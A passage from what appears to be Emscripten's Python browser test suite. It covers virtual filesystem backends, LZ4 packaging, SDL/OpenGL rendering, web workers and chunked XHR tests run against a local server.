self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']''', '-lidbfs.js'])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']''', '-lidbfs.js'])
def test_fs_memfs_fsync(self):
args = self.get_async_args() + ['-s', 'EXIT_RUNTIME=1']
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_memfs_fsync.c'), '1', force_c=True, args=args + ['-DSECRET=\"' + secret + '\"'])
def test_fs_workerfs_read(self):
secret = 'a' * 10
secret2 = 'b' * 10
create_test_file('pre.js', '''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
self.btest(path_from_root('tests', 'fs', 'test_workerfs_read.c'), '1', force_c=True, args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_workerfs_package(self):
create_test_file('file1.txt', 'first')
ensure_dir('sub')
open(os.path.join('sub', 'file2.txt'), 'w').write('second')
self.run_process([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', os.path.join('sub', 'file2.txt'), '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_lz4fs_package(self):
# generate data
ensure_dir('subdir')
create_test_file('file1.txt', '0123456789' * (1024 * 128))
open(os.path.join('subdir', 'file2.txt'), 'w').write('1234567890' * (1024 * 128))
random_data = bytearray(random.randint(0, 255) for x in range(1024 * 128 * 10 + 1))
random_data[17] = ord('X')
open('file3.txt', 'wb').write(random_data)
# compress in emcc, -s LZ4=1 tells it to tell the file packager
print('emcc-normal')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'])
assert os.path.getsize('file1.txt') + os.path.getsize(os.path.join('subdir', 'file2.txt')) + os.path.getsize('file3.txt') == 3 * 1024 * 128 * 10 + 1
assert os.path.getsize('test.data') < (3 * 1024 * 128 * 10) / 2 # over half is gone
print(' emcc-opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'])
# compress in the file packager, on the server. the client receives compressed data and can just use it. this is typical usage
print('normal')
out = subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2'])
# load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
print('manual')
subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2'])
print(' opts+closure')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2', '--closure', '1', '-g1', '-s', 'CLOSURE_WARNINGS=quiet'])
'''# non-lz4 for comparison
try:
os.mkdir('files')
except OSError:
pass
shutil.copyfile('file1.txt', os.path.join('files', 'file1.txt'))
shutil.copyfile('file2.txt', os.path.join('files', 'file2.txt'))
shutil.copyfile('file3.txt', os.path.join('files', 'file3.txt'))
out = subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'])'''
def test_separate_metadata_later(self):
# see issue #6654 - we need to handle separate-metadata both when we run before
# the main program, and when we are run later
create_test_file('data.dat', ' ')
self.run_process([PYTHON, FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js'])
self.btest(os.path.join('browser', 'separate_metadata_later.cpp'), '1', args=['-s', 'FORCE_FILESYSTEM=1'])
def test_idbstore(self):
secret = str(time.time())
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
self.btest(path_from_root('tests', 'idbstore.c'), str(stage), force_c=True, args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2'] + self.get_async_args())
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync_worker.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-s', 'INITIAL_MEMORY=80MB'] + self.get_async_args())
def test_force_exit(self):
self.btest('force_exit.c', force_c=True, expected='17', args=['-s', 'EXIT_RUNTIME=1'])
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_test_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
self.btest('sdl_canvas_size.c', expected='1',
args=['-O2', '--minify', '0', '--shell-file',
path_from_root('tests', 'sdl_canvas_size.html'), '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
create_test_file('sdl_gl_read.c', self.with_report_result(open(path_from_root('tests', 'sdl_gl_read.c')).read()))
self.compile_btest(['sdl_gl_read.c', '-o', 'something.html', '-lSDL', '-lGL'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-s', 'FULL_ES3=1', '-lSDL', '-lGL'],
message='You should see a blue triangle.')
@requires_graphics_hardware
def test_sdl_ogl(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_regal(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'USE_REGAL=1', '-DUSE_REGAL', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-s', 'INLINING_LIMIT=1', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_glfw(self):
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lglfw', '-lGL'])
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_minimal(self):
self.btest('glfw_minimal.c', '1', args=['-lglfw', '-lGL'])
self.btest('glfw_minimal.c', '1', args=['-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest('test_glfw_time.c', '1', args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'])
def _test_egl_base(self, *args):
create_test_file('test_egl.c', self.with_report_result(open(path_from_root('tests', 'test_egl.c')).read()))
self.compile_btest(['-O2', 'test_egl.c', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_egl(self):
self._test_egl_base()
@requires_threads
@requires_graphics_hardware
def test_egl_with_proxy_to_pthread(self):
self._test_egl_base('-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1')
def _test_egl_width_height_base(self, *args):
create_test_file('test_egl_width_height.c', self.with_report_result(open(path_from_root('tests', 'test_egl_width_height.c')).read()))
self.compile_btest(['-O2', 'test_egl_width_height.c', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
def test_egl_width_height(self):
self._test_egl_width_height_base()
@requires_threads
def test_egl_width_height_with_proxy_to_pthread(self):
self._test_egl_width_height_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD=1')
@requires_graphics_hardware
def test_egl_createcontext_error(self):
self.btest('test_egl_createcontext_error.c', '1', args=['-lEGL', '-lGL'])
def test_worker(self):
# Test running in a web worker
create_test_file('file.dat', 'data for worker')
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.port)
html_file.close()
for file_data in [1, 0]:
cmd = [EMCC, path_from_root('tests', 'hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else [])
print(cmd)
subprocess.check_call(cmd)
self.assertExists('worker.js')
self.run_browser('main.html', '', '/report_result?hello from worker, and :' + ('data for w' if file_data else '') + ':')
self.assertContained('you should not see this text when in a worker!', self.run_js('worker.js')) # code should run standalone too
@no_firefox('keeps sending OPTIONS requests, and eventually errors')
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<html>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.port)
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
# vs. os.path.join(self.get_dir(), filename)
# vs. path_from_root('tests', 'hello_world_gles.c')
self.compile_btest([path_from_root('tests', c_source_filename), '-g', '-s', 'SMALL_XHR_CHUNKS=1', '-o', worker_filename,
'--pre-js', prejs_filename])
chunkSize = 1024
data = os.urandom(10 * chunkSize + 1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data) & 0xffffffff # Python 2 compatibility: force bigint
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True, chunkSize, data, checksum, self.port))
server.start()
# block until the server is actually ready
for i in range(60):
try:
urlopen('http://localhost:11111')
break
except Exception as e:
print('(sleep for server)')
time.sleep(1)
if i == 60:
raise e
try:
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
finally:
server.terminate()
# Avoid race condition on cleanup, wait a bit so that processes have released file locks so that test tearDown won't
# attempt to rmdir() files in use.
if WINDOWS:
time.sleep(2)
@requires_graphics_hardware
def test_glgears(self, extra_args=[]):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'] + extra_args)
@requires_graphics_hardware
@requires_threads
def test_glgears_pthreads(self, extra_args=[]):
# test that a program that doesn't use pthreads still works with with pthreads enabled
# (regression test for https://github.com/emscripten-core/emscripten/pull/8059#issuecomment-488105672)
self.test_glgears(['-s', 'USE_PTHREADS=1'])
@requires_graphics_hardware
def test_glgears_long(self):
for proxy in [0, 1]:
print('proxy', proxy)
self.btest('hello_world_gles.c', expected=list(map(str, range(15, 500))), args=['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut', '-DANIMATE'] + (['--proxy-to-worker'] if proxy else []))
@requires_graphics_hardware
def test_glgears_animation(self):
es2_suffix = ['', '_full', '_full_944']
for full_es2 in [0, 1, 2]:
print(full_es2)
self.compile_btest([path_from_root('tests', 'hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING=1', '-lGL', '-lglut',
'--shell-file', path_from_root('tests', 'hello_world_gles_shell.html')] +
(['-s', 'FULL_ES2=1'] if full_es2 else []))
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
@requires_graphics_hardware
def test_fulles2_sdlproc(self):
self.btest('full_es2_sdlproc.c', '1', args=['-s', 'GL_TESTING=1', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2=1', '-lGL', '-lSDL', '-lglut'])
@requires_graphics_hardware
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'], outfile='something.html',
message='You should see animating gears.')
with open('something.html') as f:
assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
@requires_graphics_hardware
def test_glbook(self):
self.emcc_args.remove('-Werror')
self.emcc_args += ['-Wno-pointer-sign', '-Wno-int-conversion']
programs = self.get_library('glbook', [
os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.o'),
os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.o'),
os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.o'),
os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.o'),
os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.o'),
os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.o'),
os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.o'),
], configure=None)
def book_path(*pathelems):
return path_from_root('tests', 'glbook', *pathelems)
for program in programs:
print(program)
basename = os.path.basename(program)
args = ['-lGL', '-lEGL', '-lX11']
if basename == 'CH10_MultiTexture.o':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.o':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.o', '.png')),
args=args)
@requires_graphics_hardware
@parameterized({
'normal': (['-s', 'FULL_ES2=1'],),
# Enabling FULL_ES3 also enables ES2 automatically
'full_es3': (['-s', 'FULL_ES3=1'],)
})
def test_gles2_emulation(self, args):
print(args)
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
for source, reference in [
(os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), path_from_root('tests', 'glbook', 'CH02_HelloTriangle.png')),
# (os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), path_from_root('tests', 'glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureWrap.png')),
# (os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), path_from_root('tests', 'glbook', 'CH09_SimpleTexture2D.png')),
(os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), path_from_root('tests', 'glbook', 'CH10_MultiTexture.png')),
(os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), path_from_root('tests', 'glbook', 'CH13_ParticleSystem.png')),
]:
print(source)
self.btest(source,
reference=reference,
args=['-I' + path_from_root('tests', 'glbook', 'Common'),
path_from_root('tests', 'glbook', 'Common', 'esUtil.c'),
path_from_root('tests', 'glbook', 'Common', 'esShader.c'),
path_from_root('tests', 'glbook', 'Common', 'esShapes.c'),
path_from_root('tests', 'glbook', 'Common', 'esTransform.c'),
'-lGL', '-lEGL', '-lX11',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'] + args)
@requires_graphics_hardware
def test_clientside_vertex_arrays_es3(self):
self.btest('clientside_vertex_arrays_es3.c', reference='gl_triangle.png', args=['-s', 'FULL_ES3=1', '-s', 'USE_GLFW=3', '-lglfw', '-lGLESv2'])
def test_emscripten_api(self):
self.btest('emscripten_api_browser.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_third']''', '-lSDL'])
def test_emscripten_api2(self):
def setup():
create_test_file('script1.js', '''
Module._set(456);
''')
create_test_file('file1.txt', 'first')
create_test_file('file2.txt', 'second')
setup()
self.run_process([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM=1'])
# check using file packager to another dir
self.clear()
setup()
ensure_dir('sub')
self.run_process([PYTHON, FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
shutil.copyfile(os.path.join('sub', 'test.data'), 'test.data')
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM=1'])
def test_emscripten_api_infloop(self):
self.btest('emscripten_api_browser_infloop.cpp', '7')
def test_emscripten_fs_api(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png') # preloaded *after* run
self.btest('emscripten_fs_api_browser.cpp', '1', args=['-lSDL'])
def test_emscripten_fs_api2(self):
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=0"])
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=1"])
@requires_threads
def test_emscripten_main_loop(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'EXIT_RUNTIME=1']]:
self.btest('emscripten_main_loop.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_settimeout(self):
for args in [
[],
# test pthreads + AUTO_JS_LIBRARIES mode as well
['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'AUTO_JS_LIBRARIES=0']
]:
self.btest('emscripten_main_loop_settimeout.cpp', '1', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_and_blocker.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_setimmediate(self):
for args in [[], ['--proxy-to-worker'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=args)
def test_fs_after_main(self):
for args in [[], ['-O1']]:
self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
self.btest('sdl_quit.c', '1', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
# Covered by dEQP text suite (we can remove it later if we add coverage for that).
@requires_graphics_hardware
def test_glframebufferattachmentinfo(self):
self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])
@requires_graphics_hardware
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_sdlglshader2(self):
self.btest('sdlglshader2.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_threads
def test_gl_textures(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1']]:
self.btest('gl_textures.cpp', '0', args=['-lGL'] + args)
@requires_graphics_hardware
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_strides(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_gl_ps_worker(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
@requires_graphics_hardware
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], reference_slack=1)
@requires_graphics_hardware
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS=1', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
@requires_graphics_hardware
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS=1', '-lGL', '-lSDL'], expected=['1'])
@requires_graphics_hardware
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328', '2411982848'], args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre(self):
